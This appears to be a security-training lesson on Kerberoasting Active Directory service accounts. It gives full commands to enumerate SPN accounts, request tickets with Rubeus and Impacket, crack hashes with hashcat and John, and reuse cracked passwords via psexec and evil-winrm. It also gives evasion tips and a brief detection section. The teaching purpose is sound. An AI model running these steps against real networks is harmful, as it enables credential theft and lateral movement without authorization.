Kerberoasting

intermediate35 minWriteup

Extracting and cracking service account credentials

Learning Objectives

  • Understand Kerberoasting
  • Request service tickets
  • Extract TGS hashes
  • Crack service account passwords

Kerberoasting is one of the most powerful attacks against Active Directory. Any domain user can request service tickets for accounts with SPNs, and those tickets are encrypted with the account's password hash - which means they can be cracked offline.

Think of it like this: you ask the bouncer for a VIP pass (service ticket), and the pass is protected with a lock (password hash). You take the pass home and try every key until one works. The bouncer never knows you're attacking the lock.

No Special Privileges Required

The beauty of Kerberoasting is that ANY domain user can request service tickets. You don't need admin rights, just valid domain credentials.

How Kerberoasting Works

11. User requests TGS (service ticket) for SPN
2   User --> KDC: 606070;">#a5d6ff;">"I want to access MSSQLSvc/sql01.corp.local"
3 
42. KDC returns TGS encrypted with service account's hash
5   KDC --> User: [TGS encrypted with svc_sql's NTLM hash]
6 
73. Attacker extracts encrypted part of ticket
8   Extract: RC4 encrypted blob = f(password hash)
9 
104. Attacker cracks offline
11   Hashcat: Try passwords until one decrypts the ticket
12 
135. Attacker now has service account password!

Why It Works

This is a fundamental design decision in Kerberos. Tickets MUST be encrypted with the service account's key so the service can decrypt them. Microsoft can't fix this without breaking Kerberos.

Finding Kerberoastable Accounts

powershell
1606070;"># PowerShell - Find SPNs
2Get-ADUser -Filter {ServicePrincipalName -like 606070;">#a5d6ff;">"*"} -Properties ServicePrincipalName
3 
4606070;"># PowerView
5Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname
6 
7606070;"># LDAP query
8$search = New-Object DirectoryServices.DirectorySearcher([ADSI]606070;">#a5d6ff;">"")
9$search.Filter = 606070;">#a5d6ff;">"(servicePrincipalName=*)"
10$search.FindAll() | ForEach-Object { $_.Properties.samaccountname }
bash
1606070;"># Impacket GetUserSPNs.py
2GetUserSPNs.py corp.local/user:password -dc-ip 192.168.1.10
3 
4606070;"># ldapsearch
5ldapsearch -x -H ldap:606070;">//dc.corp.local -D "user@corp.local" -w 'pass' \
6  -b 606070;">#a5d6ff;">"DC=corp,DC=local" "(servicePrincipalName=*)" sAMAccountName servicePrincipalName

Performing the Attack

From Windows

powershell
1606070;"># Rubeus - Most popular tool
2.\Rubeus.exe kerberoast /outfile:hashes.txt
3 
4606070;"># Target specific user
5.\Rubeus.exe kerberoast /user:svc_sql /outfile:hash.txt
6 
7606070;"># Request RC4 tickets (easier to crack)
8.\Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt
9 
10606070;"># PowerView + Request-SPNTicket
11Request-SPNTicket -SPN 606070;">#a5d6ff;">"MSSQLSvc/sql01.corp.local"
12 
13606070;"># Invoke-Kerberoast (from PowerSploit)
14Import-Module .\Invoke-Kerberoast.ps1
15Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File hashes.txt

From Linux

bash
1606070;"># Impacket GetUserSPNs.py - Request tickets and save hashes
2GetUserSPNs.py corp.local/user:password -dc-ip 192.168.1.10 -request -outputfile hashes.txt
3 
4606070;"># Target specific user
5GetUserSPNs.py corp.local/user:password -dc-ip 192.168.1.10 -request -target-user svc_sql

RC4 vs AES

Older service accounts use RC4 encryption (easier/faster to crack). Newer ones might use AES256. Use /tgtdeleg in Rubeus to force RC4 when possible.

Cracking the Hashes

bash
1606070;"># Hashcat - Most efficient (GPU)
2606070;"># Mode 13100 = Kerberos 5 TGS-REP (RC4)
3hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
4 
5606070;"># With rules for better coverage
6hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule
7 
8606070;"># Mode 19600 = Kerberos 5 TGS-REP (AES-128)
9606070;"># Mode 19700 = Kerberos 5 TGS-REP (AES-256)
10hashcat -m 19700 hashes.txt rockyou.txt
11 
12606070;"># John the Ripper
13john --format=krb5tgs --wordlist=rockyou.txt hashes.txt

Cracking Speed

RC4 hashes crack at ~billions per second on modern GPUs. AES256 is slower but still feasible. Weak service account passwords fall quickly.

Using Cracked Credentials

bash
1606070;"># Once you have the password, use it!
2 
3606070;"># Check where svc_sql is admin
4crackmapexec smb 192.168.1.0/24 -u svc_sql -p 606070;">#a5d6ff;">'CrackedPassword123'
5 
6606070;"># PSExec if local admin
7psexec.py corp.local/svc_sql:606070;">#a5d6ff;">'CrackedPassword123'@target
8 
9606070;"># WinRM
10evil-winrm -i target -u svc_sql -p 606070;">#a5d6ff;">'CrackedPassword123'
11 
12606070;"># Check for SQL access (if MSSQLSvc SPN)
13mssqlclient.py corp.local/svc_sql:606070;">#a5d6ff;">'CrackedPassword123'@sql01.corp.local

Targeted Kerberoasting

Not all Kerberoastable accounts are equal. Prioritize based on:

  • Privileged Group Membership: Admins, Backup Operators
  • AdminCount = 1: Protected by AdminSDHolder
  • Password Age: Old passwords might be weaker
  • Account Type: Service accounts often have weak passwords
powershell
1606070;"># Find high-value Kerberoastable accounts
2Get-ADUser -Filter {ServicePrincipalName -like 606070;">#a5d6ff;">"*" -and AdminCount -eq 1} -Properties *
3 
4606070;"># Check group memberships
5Get-ADUser -Filter {ServicePrincipalName -like 606070;">#a5d6ff;">"*"} -Properties MemberOf |
6  Where-Object { $_.MemberOf -match 606070;">#a5d6ff;">"Admin" }

Kerberoasting Methodology

Kerberoasting Attack Flow

1
EnumerateFind all accounts with SPNs
2
PrioritizeFocus on privileged/high-value accounts
3
RequestGet service tickets for targets
4
ExtractSave hashes in hashcat format
5
CrackRun hashcat with good wordlists and rules
6
UseAuthenticate with cracked passwords

Detection & Prevention

1Detection:
2├── Event ID 4769 - TGS requests
3│   └── Watch for many requests from single user
4├── Event ID 4768 - TGT requests
5│   └── Watch for requests with RC4 encryption
6└── Monitor for known Kerberoasting tools
7 
8Prevention:
9├── Use strong passwords for service accounts (25+ chars)
10├── Use Group Managed Service Accounts (gMSA)
11├── Disable RC4 encryption where possible
12├── Limit who can read SPN attributes
13└── Regular service account password rotation

OPSEC

Requesting many service tickets at once looks suspicious. Space out requests or target only high-value accounts to avoid detection.

Knowledge Check

Quick Quiz
Question 1 of 3

What makes an account vulnerable to Kerberoasting?

Challenges

Kerberoast the Domain

Challenge
🔥 intermediate

Find all Kerberoastable accounts, request their tickets, and crack at least one password.

Need a hint? (4 available)

Key Takeaways

  • Any domain user can Kerberoast - no special privileges needed
  • Accounts with SPNs can have tickets requested and cracked offline
  • Service account passwords are often weak and reused
  • Use hashcat mode 13100 for RC4, 19700 for AES256
  • Prioritize privileged accounts for targeted attacks
  • gMSA accounts are resistant to Kerberoasting